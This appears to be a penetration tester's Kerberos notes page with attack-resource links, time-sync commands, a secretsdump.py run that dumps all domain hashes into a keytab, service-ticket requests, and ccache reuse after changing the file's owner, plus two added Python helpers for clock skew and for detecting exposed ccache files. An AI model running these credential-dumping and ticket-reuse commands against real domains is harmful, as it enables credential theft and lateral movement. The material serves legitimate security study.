# Kerberos

* <https://www.roguelynn.com/words/explain-like-im-5-kerberos/>
* <https://vbscrub.com/2020/05/13/kerberos-protocol-explained/>
* <https://www.tarlogic.com/en/blog/how-kerberos-works/>
* <https://www.tarlogic.com/en/blog/how-to-attack-kerberos/>
* <https://www.tarlogic.com/en/blog/kerberos-iii-how-does-delegation-work/>
* <https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a>
* <https://habr.com/ru/company/tomhunter/blog/507140/>
* <https://habr.com/ru/company/tomhunter/blog/509290/>
* <https://ardent101.github.io/posts/kerberos_theory/>
* <https://ardent101.github.io/posts/kerberos_general_attacks/>
* <https://habr.com/ru/articles/803163/>

{% embed url="<https://blog.zsec.uk/common-tool-errors-kerberos/>" %}

{% embed url="<https://youtu.be/qZPvgoUzCdI>" %}

## Synchronize Time

Using `ntpdate`:

```
$ sudo apt install ntpdate -y
$ sudo ntpdate $DC
```

Using `faketime`:

```
$ sudo apt install faketime -y
$ faketime '1970-01-01 00:00:00' /bin/date
$ faketime "`ntpdate -q $DC | awk -F. '{print $1}'`" /bin/date
```

Using LDAP:

```
$ LDAP_TIME=`ldapsearch -x -H ldap://DC01.megacorp.local -s base -b "" currentTime | awk '/currentTime/ {print $2}' | grep -v "requesting:" | sed -E 's/^([0-9]{4})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2})\.0Z$/\1-\2-\3 \4:\5:\6 UTC/'`
$ LDAP_TIME=`date -d "$LDAP_TIME X hours" '+%Y-%m-%d %H:%M:%S'`
$ echo "$LDAP_TIME" && sudo date -u -s "$LDAP_TIME"
```
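Added example (not from the original notes): the LDAP `currentTime` parsing above done in Python, which also reports the skew between the DC clock and the local clock and whether it is past the 5-minute tolerance a KDC enforces before it answers with `KRB_AP_ERR_SKEW`. The `ldapsearch` output is a constructed sample and the function names are my own.

```python
import re
from datetime import datetime, timedelta, timezone

# KDCs reject requests whose timestamp is more than 5 minutes off their own
# clock (KRB_AP_ERR_SKEW / "Clock skew too great"), hence the resync above.
MAX_SKEW = timedelta(minutes=5)

# Constructed sample of `ldapsearch -x -s base -b "" currentTime` output;
# the "# requesting: currentTime" comment is the line the grep above drops.
SAMPLE_LDAPSEARCH_OUTPUT = """\
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectclass=*)
# requesting: currentTime
#

#
dn:
currentTime: 20240501123045.0Z

# search result
search: 2
result: 0 Success
"""

# LDAP GeneralizedTime as AD emits it: YYYYMMDDhhmmss.0Z (always UTC).
_GENERALIZED_TIME = re.compile(r"^(\d{4})(\d{2})(\d{2})(\d{2})(\d{2})(\d{2})(?:\.\d+)?Z$")


def extract_current_time(ldif: str) -> str:
    """Pull the raw currentTime value out of ldapsearch output, ignoring comments."""
    for line in ldif.splitlines():
        if line.startswith("#"):
            continue
        if line.startswith("currentTime:"):
            return line.split(":", 1)[1].strip()
    raise ValueError("no currentTime attribute in ldapsearch output")


def parse_generalized_time(value: str) -> datetime:
    """Turn 20240501123045.0Z into an aware UTC datetime."""
    m = _GENERALIZED_TIME.match(value)
    if not m:
        raise ValueError(f"unexpected currentTime format: {value!r}")
    y, mo, d, h, mi, s = (int(g) for g in m.groups())
    return datetime(y, mo, d, h, mi, s, tzinfo=timezone.utc)


def as_date_command_arg(dc_time: datetime) -> str:
    """Format for `sudo date -u -s "<value>"`, the same shape the sed above produces."""
    return dc_time.strftime("%Y-%m-%d %H:%M:%S UTC")


def clock_skew(dc_time: datetime, local_time: datetime) -> timedelta:
    """Signed skew: positive when the local clock runs ahead of the DC."""
    return local_time.astimezone(timezone.utc) - dc_time


def needs_resync(dc_time: datetime, local_time: datetime) -> bool:
    """True when Kerberos would fail with a clock-skew error at this offset."""
    return abs(clock_skew(dc_time, local_time)) > MAX_SKEW


if __name__ == "__main__":
    dc_now = parse_generalized_time(extract_current_time(SAMPLE_LDAPSEARCH_OUTPUT))
    local_now = datetime.now(timezone.utc)   # the sample DC time is fixed, so expect a large skew
    print("DC time :", as_date_command_arg(dc_now))
    print("skew    :", clock_skew(dc_now, local_now))
    print("resync? :", needs_resync(dc_now, local_now))
```

Because `currentTime` is always UTC, the value from `as_date_command_arg` can go straight into `date -u -s` with no hour offset; the `X hours` adjustment in the one-liner above is only needed if the local `date` is not run with `-u`.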

## Describe Tickets

* <https://github.com/YossiSassi/Get-KerberosServiceTicketAudit>

Using [describeTicket.py](https://github.com/fortra/impacket/blob/master/examples/describeTicket.py):

```
$ describeTicket.py --rc4 21c1d44272e8ad1ee9e6b1aed2943688 --aes d38bf2b75fd1732a4cd7e5d129c62f0ed7feaccaff05c6b4a3bf6a9fc2004036 /tmp/snovvcrash.ccache
```

## Decrypt KRB5 Traffic

* <https://dirkjanm.io/active-directory-forest-trusts-part-two-trust-transitivity/>
* <https://medium.com/tenable-techblog/decrypt-encrypted-stub-data-in-wireshark-deb132c076e7>

{% code title="keytab.sh" %}

```bash
REALM='MEGACORP.LOCAL'
secretsdump.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local -just-dc | tee secretsdump.out

# ---

cat secretsdump.out | grep aad3b435 | awk -F: '{print "    (23, '\''"$4"'\''),"}' > keys
cat secretsdump.out | grep aes256-cts-hmac-sha1-96 | awk -F: '{print "    (18, '\''"$3"'\''),"}' >> keys
curl -sSL https://github.com/dirkjanm/forest-trust-tools/raw/6bfeb990f0db8a580afe5cbba3cce1bf959a7fb8/keytab.py > keytab.py
awk 'NR <= 112' keytab.py > t
cat keys >> t
awk 'NR >= 118' keytab.py >> t
sed -i "s/TESTSEGMENT.LOCAL/${REALM}/g" t
mv t keytab.py
python3 keytab.py keytab.kt
```

{% endcode %}

## Kerberos on Linux

* <https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory>

Check `KRB5CCNAME` environment variable contents:

```
$ env | grep KRB5
```

Request TGT supplying password:

```
$ kinit
$ klist
```

List available SPNs:

```
$ ldapsearch -Y GSSAPI -H ldap://dc1.megacorp.local -D "Administrator@MEGACORP.LOCAL" -W -b "dc=megacorp,dc=local" "servicePrincipalName=*" servicePrincipalName
```

Request TGS for MSSQL service:

```
$ kvno MSSQLSvc/SRV01.megacorp.local:1433
$ klist
```

Re-using keytab files to load and renew a TGT:

```
$ kinit administrator@MEGACORP.LOCAL -k -t /tmp/administrator.keytab
$ klist
$ kinit -R
```

Re-using ccache files:

```
$ sudo chown snovvcrash:snovvcrash /tmp/krb5cc_31337
$ kdestroy
$ export KRB5CCNAME=/tmp/krb5cc_31337
$ klist
```
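Added check, not from the original notes, written from the defender's side of the ccache re-use above: a small scanner that lists `krb5cc_*` files in `/tmp` that are readable by other users or are owned by a different uid than the one in their name (which is what the `chown` above leaves behind), plus a helper that resolves a `KRB5CCNAME` value to its file path. The demo directory and file names are constructed; the function names are my own.

```python
import os
import re
import stat
import tempfile

# MIT Kerberos names the default file cache /tmp/krb5cc_<uid>; some setups
# (SSSD, newer libkrb5) append a random suffix: krb5cc_<uid>_XXXXXX.
_CCACHE_NAME = re.compile(r"^krb5cc_(?P<uid>\d+)(?:_.*)?$")


def ccache_path_from_env(value: str):
    """Resolve a KRB5CCNAME value to a file path.

    The variable may carry a cache-type prefix (FILE:/tmp/krb5cc_1000). Only
    FILE caches are a single on-disk file; KEYRING:, KCM: and DIR: return None.
    """
    kind, sep, rest = value.partition(":")
    if not sep:
        return value            # bare path, FILE type implied
    return rest if kind == "FILE" else None


def check_ccache(path: str):
    """Return findings for one cache file; an empty list means it looks fine.

    Two conditions let another local user pick up the tickets: the file is
    group/world readable, or it is owned by a different uid than the one in
    its name.
    """
    findings = []
    st = os.stat(path)
    mode = stat.S_IMODE(st.st_mode)
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(f"{path}: readable by group/others (mode {mode:04o}), expected 0600")
    m = _CCACHE_NAME.match(os.path.basename(path))
    if m and st.st_uid != int(m["uid"]):
        findings.append(f"{path}: owned by uid {st.st_uid} but named for uid {m['uid']}")
    return findings


def find_exposed_ccaches(directory: str = "/tmp"):
    """Scan a directory for krb5cc_* files and collect every finding."""
    findings = []
    for name in sorted(os.listdir(directory)):
        if name.startswith("krb5cc_"):
            findings.extend(check_ccache(os.path.join(directory, name)))
    return findings


def _touch(path: str, mode: int):
    with open(path, "wb"):
        pass
    os.chmod(path, mode)


def demo():
    """Constructed /tmp lookalike: one correct cache, one leaky, one mis-owned."""
    me = os.getuid()
    with tempfile.TemporaryDirectory() as d:
        _touch(os.path.join(d, f"krb5cc_{me}"), 0o600)            # fine
        _touch(os.path.join(d, f"krb5cc_{me}_AbCdEf"), 0o644)     # world-readable
        _touch(os.path.join(d, f"krb5cc_{me + 1}"), 0o600)        # named for another uid
        return find_exposed_ccaches(d)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
    print("live scan of /tmp:", find_exposed_ccaches("/tmp") or "nothing exposed")
```

Run as root it covers every user's cache; as an unprivileged user `os.stat` still works on files in `/tmp`, so the ownership and mode findings are complete, only the contents stay out of reach.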

### FreeIPA

* <https://tishina.in/ops/freeipa-postexploitation>
* <https://habr.com/ru/companies/rvision/articles/825086/>

A blog series by [@n0pe\_sled](https://medium.com/@n0pe_sled) on attacking FreeIPA:

* [Building a FreeIPA Lab](https://posts.specterops.io/building-a-freeipa-lab-17f3f52cd8d9)
* [Attacking FreeIPA — Part I Authentication](https://posts.specterops.io/attacking-freeipa-part-i-authentication-77e73d837d6a)
* [Attacking FreeIPA — Part II Enumeration](https://posts.specterops.io/attacking-freeipa-part-ii-enumeration-ad27224371e1)
* [Attacking FreeIPA — Part III: Finding A Path](https://posts.specterops.io/attacking-freeipa-part-iii-finding-a-path-677405b5b95e)
* [Attacking FreeIPA — Part IV: CVE-2020–10747](https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b)
* <https://book.hacktricks.xyz/linux-hardening/freeipa-pentesting>

